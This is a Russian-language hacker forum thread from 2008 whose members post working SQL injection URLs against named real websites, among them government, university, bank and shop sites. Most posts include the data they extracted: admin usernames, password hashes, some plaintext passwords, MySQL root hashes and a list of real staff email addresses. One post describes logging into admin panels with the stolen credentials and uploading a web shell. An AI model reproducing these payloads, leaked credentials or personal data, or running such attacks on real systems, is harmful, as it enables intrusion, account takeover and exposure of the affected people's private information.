SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    FNS, cremator (c)

    ламал недавно) можно достать модераторов.. и вешать активные хсс.. дальше не смотрел..
     
  2. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    http://www.hat.kz/?order=3&category=-1+union+select+1,2,3,version(),5,6,7--

    5 ветка

    http://www.hat.kz/?order=3&category=-1+union+select+1,2,3,concat(table_name,char(58),table_schema),5,6,7+from+INFORMATION_SCHEMA.tables--

    joomla)

    jos_users:hatkz_autosapa - видим что таблица пользователей находится в бд hatkz_autosapa

    и поэтому:

    http://www.hat.kz/?order=3&category=-1+union+select+1,2,3,concat(username,char(58),password,char(58),email),5,6,7+from+hatkz_autosapa.jos_users--

    admin:0cc399da4fb1e5952f2b30c0bd84d6ad:1vt3X6E9loXO5f9W:auto@sapa.kz
     
  3. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Зона gov:
    Code:
    http://www.lvif.gov.lv/?object_id=1344+union+select+1,name,3+from+VF_admins--
    Code:
    http://www.lvif.gov.lv/?object_id=1344+union+select+1,password,3+from+VF_admins--
    логин/пасс:
    Code:
    videsinvfonds:f7S2ApsSKXbP
    Code:
    Fonds:tests
    ----------------------------------------
    Code:
    http://www.mete.gov.al/rub.php?idr=121+and+1=2+union+select+1,2,3,4,5,6,concat(username,char(58),password),8,9,10,11,12+from+editor--
    логин/пасс:
    Code:
    admin:da6908b78bbf1e1541001e8e3dbf2467
    ----------------------------------------
    Code:
    http://www.ert.gov.al/ert_alb/cal_det.html?Id=23+and+1=2+union+all+select+1,concat(userid,char(58),password),3,null,null,null,null,null+from+users/*
    логин/пасс:
    Code:
    altink:altinx
    -----------------------------------------
    Покаместь все....
     
    1 person likes this.
  4. FNS

    FNS Member

    Joined:
    6 Nov 2008
    Messages:
    16
    Likes Received:
    11
    Reputations:
    0
    Online магазин

    Code:
    http://urshop.tv/product-view.html?p=-98+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+users--
     
    #6784 FNS, 13 Nov 2008
    Last edited: 13 Nov 2008
  5. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    4 ветка, читалка файлов не работает, доступа к mysql.users нет.

    http://www.pluralism.org/news/article.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+/*
     
    #6785 truelamer, 13 Nov 2008
    Last edited: 13 Nov 2008
  6. vladim1

    vladim1 New Member

    Joined:
    12 Nov 2008
    Messages:
    9
    Likes Received:
    1
    Reputations:
    0
    HARDWARE SHOP
     
  7. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Code:
    http://www.robappelhof.com/view.php?sub=yes&id=-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9+from+users/*
    логин/пасс:
    Code:
    sdf:asdf
    --------------------------------------------
    Code:
    http://www.ghanadate.co.uk/b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6,7,8,9,10/**/from/**/members/*
    логин/пасс:
    Code:
    montego1234:cf160b832b994d0ca868dc74ef856880
    ----------------------------------------
    Code:
    http://www.fqs-al.org/index.php?faqe=list&kid=-9999+union+all+select+1,concat_ws(char(58),user,password),3,4,5+from+mysql.user--
    логин/пасс:
    Code:
    yroot:129861984de011d2
    Code:
    fqsweb:51dbed7249c11393
    Code:
    fqs:34a07b654db61525
    Code:
    yscr_a8fGf:261cc0e75ff78611
    --------------------------------------------
    Code:
    http://www.co-plan.org/egug/rub.php?idr=7+and+1=2+union+all+select+1,2,3,concat(username,char(58),password),5,6,7,8,9+from+editor--&l=a
    логин/пасс:
    Code:
    admin:fe01ce2a7fbac8fafaed7c982a04e229
    -------------------------------------------------
    Code:
    http://comenri.com/index.php?option=com_simpleshop&task=browse&Itemid=30&catid=-1+UNION+SELECT+user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user()+FROM+jos_users--
    логин/пасс:
    Code:
    admin:acedc1e07c3ea3d226615527a4983e37:WQkaXp1lbltQZCmR
    ------------------------------------------------
    Code:
    http://www.yappika.or.id/index.php?option=com_beamospetition&pet=-5%20UNION%20SELECT%20user(),user(),user(),user(),user(),user(),user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user()%20FROM%20jos_users--&lang=id
    логин/пасс:
    Code:
    admin:c3839ac39113c5a82ca8547820819dbc:g454EJEzLbYjADq5
    Code:
    fahrul:eea3b7ed87cdf07e7bbc4d577ccb6b5d:dixDCoe9nsft5h11
    Code:
    Myleea:0f7b2d7ed181fd33cddc1ba9d79869d7:XpcWyKrnQgJuUXwU
    Code:
    Ira_Nezabudka:fd8ccc478642302747a2c4dc335a343a:PJkHhgwsMsFbSBnC
    Code:
    Rini:5b68afeea28450750bc4e055c109d752:NbEsp3lBDRnQhxJO
    Code:
    sawsarpaltela:54708a96d0ae079776ecefc35151d783:QHdpwJ6XhdsqRERs
    Code:
    wergiewom:06ecaade2a8f9d3ebf49a44ce7bb96d6:4OtKGLPrFWsx1C85
    Code:
    Meloomime:d56dfae4bfbf100ed8b564587b3d672c:NFvCoL8vqnhbnQeP
    Code:
    Kibeirreste:9ae987505c6b005935c50074ea356193:mPrgld5lDjYniO6n
    Code:
    teja:3a39d97d4bd94cefacc88db044dc3c0e:D5vPL3RHV8qJK9je
    Code:
    Bambang:8bad21a0c5711f985d4a2a7d80d26f73:VXxkMgQnu1jS8WIF
    Code:
    shewiya:553761834941e5a605c80fd204a03786:CPk64H3Md7HYO323
    Code:
    abu_rayyan:dc4678a51b68b10d2516c24e8fa6037e:MpRjGYy7zeTjBtMA
    Code:
    margarittaes:9346bb6ebd998c9b40a4b1dc716c238f:pR3GHfgyZutYRLe4
    Code:
    sennioritta:2ef9195156e87d73787c7c1310a6bafc:aPKIaUJY6U02YEdz
    Code:
    Lilis:b6694dc2469ab892ab1593440aa0bfc8:uabh5vGv4tWSPkGH
    Code:
    oppownmix:878a75e5bf8a8c4d919da7ad46273d3e:VEJrYYnSXMUMH71f
    ------------------------------------------------
    Code:
    http://www.heibai.net/article/forum_zoom.php?forumid=15)+and+1=2+union+select+1,concat(username,0x3a,password),3+from+user+where+userid=1/*
    логин/пасс:
    Code:
    starkun:f0295802427cb4e72233d6d2b97e62e1
    -------------------------------------
    Code:
    http://www.chemistry.montana.edu/news.php?id=4990+union+select+1,2,concat_ws(0x3a,user,password),4,5,6,7+from+mysql.user/*
    Code:
    root:05980b2317eaa529
    ----------------------------------------------
    The End!
     
    2 people like this.
  8. groupby

    groupby Elder - Старейшина

    Joined:
    21 Sep 2008
    Messages:
    30
    Likes Received:
    13
    Reputations:
    0
    Code:
    http://www.music.md/studio.php?stdid=-1%20union%20select%201,2,3,4,5%20from%20tbuser/*
    
    Не могу найти ни одной колонки из этой таблицы гребаной. В общем дружно ломаем :)
     
  9. foopi

    foopi Member

    Joined:
    26 Oct 2008
    Messages:
    41
    Likes Received:
    20
    Reputations:
    5
    http://www.music.md/studio.php?stdid=-1+union+select+1,2,concat_ws(0x3a,usrLogin,usrPasswd),4,5+from+tbuser+limit+0,1/*

    пароли подходят к форуму
     
    #6789 foopi, 13 Nov 2008
    Last edited: 13 Nov 2008
    1 person likes this.
  10. Fugitif

    Fugitif Elder - Старейшина

    Joined:
    23 Sep 2007
    Messages:
    407
    Likes Received:
    227
    Reputations:
    42
    Code:
    http://cartoons.sev.com.au/index.php?catid=-1%20UNION%20SELECT%20concat(name,char(58),password),2,3,4,5,6,7,8,9,10%20FROM%20user%20LIMIT%201,1/*
    Code:
    http://cartoons.sev.com.au/index.php?catid=-1%20UNION%20SELECT%20concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7,8,9,10/*
    Code:
    http://www.pajuraturda.org/album.php?catid=-1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3/*
    Code:
    http://www.pajuraturda.org/album.php?catid=-1%20UNION%20SELECT%201,concat(user_password,char(58),username),3%20FROM%20phpbb_users%20LIMIT%201,1/*
     
  11. DREASTY

    DREASTY Elder - Старейшина

    Joined:
    19 Nov 2007
    Messages:
    38
    Likes Received:
    21
    Reputations:
    1
    http://www.tid.odessa.ua/news/?newsid=-1 UNION SELECT 1,2,3,4,5

    немогу дальше подобрать
     
  12. pento

    pento Elder - Старейшина

    Joined:
    3 Jul 2006
    Messages:
    126
    Likes Received:
    24
    Reputations:
    -1
    google://information_schema
    И вперед...
     
    #6792 pento, 13 Nov 2008
    Last edited: 13 Nov 2008
  13. FNS

    FNS Member

    Joined:
    6 Nov 2008
    Messages:
    16
    Likes Received:
    11
    Reputations:
    0
    Shop

    Code:
    http://www.ultraproducts.com/st_content.php?id=-1+union+select+1,2,concat(user_name,0x3a,password)+from+users--
    Code:
    http://www.ultraproducts.com/admin/
     
    1 person likes this.
  14. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Code:
    http://www.tid.odessa.ua/news/?newsid=-1+UNION+SELECT+table_name,2,3,4,5+from+information_schema.tables+limit+1,1--
    И перебирай таблицы,пока не найдеш нужную тебе колонку....когда найдеш почитай тут
     
  15. beerhack

    beerhack Elder - Старейшина

    Joined:
    1 Mar 2008
    Messages:
    148
    Likes Received:
    55
    Reputations:
    5
    PR5
    http://www.uwsn.org/sup.php?id=-99999+union+select+1,2,3,4,unhex(hex(version())),6/*

    version:4.1.13-standard-log
     
  16. DREASTY

    DREASTY Elder - Старейшина

    Joined:
    19 Nov 2007
    Messages:
    38
    Likes Received:
    21
    Reputations:
    1
    Спасибо m0rgan !!

    newtid@localhost
    5.0.32-Debian_7etch8-log

    http://www.tid.odessa.ua/news/?newsid=-1+UNION+SELECT+login,password,3,4,5+from+managers+limit+1,1%20--

    admin:shokhov
    price:123456
    isisis:123456
    vale:valevale
    irina:123
    towka:123456
    boris:123
    margarita:123456
    kuzoff:54214

    админку так и не нашел!
     
  17. procedure

    procedure Elder - Старейшина

    Joined:
    22 Dec 2007
    Messages:
    527
    Likes Received:
    257
    Reputations:
    46
    Акционерный коммерческий банк «Интеграл» (сокращенно АКБ «Интеграл-банк») – это универсальное банковское учреждение, предоставляющее полный комплекс услуг на внутреннем и внешнем финансовых рынках.
    url: http://fxintegral.com/
    target: http://fxintegral.com/beginer/ справа email подписка RSS
    using: в имени вводим -999999' email: любой
    Description: 4 поля. Вывод не приходит на email. Запрос -999' не обрабатывается, при нажатии отправить выводит SQL Syntax и.т.д. Запрос union+select+user(),user(),user(),user()/* проходит успешно. Вывод запроса опять же не приходит на email. Не показывается на странице.На сайте доступны различные банковские операции.
     
    2 people like this.
  18. dArKkNiGHt

    dArKkNiGHt Banned

    Joined:
    18 Aug 2008
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    а толку то? совсем ничего не даёт, ну узнал пользователей, пароли, а применить некуда.
    всю базу можно раскрутить а сделать ничего более.
    file_priv закрыт, ни шэлл, ни другие пакости не проходят :(
     
  19. jjokker

    jjokker Member

    Joined:
    19 Apr 2008
    Messages:
    7
    Likes Received:
    18
    Reputations:
    0

    Эээ... Уважаемый , а что вы вообще хотите ??? Как то давно я поднимал тему на irc по поводу целесообразности и вообще надобности взломов ;)
    Мало кто мог адекватно ответить для чего он ломает тот или иной ресурс. Сегодня за ночь пересмотрел почти всю эту ветку и тут помоему просто все учатся.
    Человеку показали как сделать определенное движение) Он его сделал и сказал спасибо! Я считаю это резальт который нужен.

    Спустя 20 мин)

    Уважаемый, Хакер это не тот человек который знает скул и как ее крутит, хакер этот тот кто думает головой. Перед тем как или во время поиска скули надо обращать внимание на все... надо собирать информацию об атакуемом сервере и понимать в конечном итоге что тебе надо от него , если только БД , то наш уважаемый -DREASTY- , толко что показал что данные очень элементарно экспортируются из БД администратора в наш Notepad++ ;) это уже в своем роде пакость (а для кого то возможно и деньги), так что на ваш вопрос по поводу того "а толку то?" лично я ответил.
    Идем далее, с чего вы делаете такие поспешные выводы относителньо того что дальше ничего не сделать? Подколоть старательного ученика в том что он плохо научился пользоваться MySQL 5.+? Или это просто ваши выводы из ходя из того что Вы ничего не смогли сделать???
    Итак(после быстрого моего анализа):
    _http://www.tid.odessa.ua/phpinfo.php
    _http://www.tid.odessa.ua/adserv/www/admin/
    (пароль и логин подходят)
    это чисто управление пользователями,кликами,баннерами,БД,ПО,обновлением ддвига... после 10 минутнорго мучения заливки шелла через баннер shell.php.gif при том что там менял настройки хранения банера не в БД и не стороннем сервере а именно в каталоге сайта ... прав на исполнение все равно не было... поэтому шелл как был залит так и удален. ;) болше ничего пробовать не сстал, поскольку понимал что где должно быть управление контентом сайта...
    Так оно и есть _http://www.tid.odessa.ua/siteadmin/
    (логин пароль опять же подходят)
    там сразу есть заливка файлов ;) прям первая первая страничка ... тыдынс _http://www.tid.odessa.ua/files/achat.php , поскольку не люблю функционал этого шелла сразу через еще и другой шелл. Более того права на сервере не велики , но на чтение практически все. более того можем вылезти из корней директории выше на другие сайты ... 2ip показал что их 3 , но в реале их там больше!

    Вывод: Уважаемый не делайте поспешных выводов!!!

    Прошу простить Администрацию и Модератора за типа оффтоп... ну просто правда выбесил пассажир =((
     
    #6799 jjokker, 15 Nov 2008
    Last edited: 15 Nov 2008
    1 person likes this.
  20. jjokker

    jjokker Member

    Joined:
    19 Apr 2008
    Messages:
    7
    Likes Received:
    18
    Reputations:
    0
    _http://www.kcl.ac.uk/news/news_details.php?news_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,email,15,16,17,18,19,20,21,22,23,24,25+from+users--&year=2008

    4.1.22-standard-log::webteam_newsdev::newsdev@localhost

    Next:
    waqar.alam@kcl.ac.uk
    christopher.saward@kcl.ac.uk
    julie.munk@kcl.ac.uk
    susan.farrell@kcl.ac.uk
    peter.graham@kcl.ac.uk
    alex.bevis@kcl.ac.uk
    kate.moore@kcl.ac.uk
    kate.saunders@kcl.ac.uk
    liz.newell@kcl.ac.uk
    melanie.gardner@kcl.ac.uk
    webnews@kcl.ac.uk
    kate.thomas@kcl.ac.uk

    префиксов нет ни перед таблицами ни в колонках.

    поэтому твоя фраза "к сожелению мало чем помогло)", черезчур поспешна ... кто ищет тот всегда найдет ...
     
    #6800 jjokker, 15 Nov 2008
    Last edited: 15 Nov 2008
    1 person likes this.
Loading...
Thread Status:
Not open for further replies.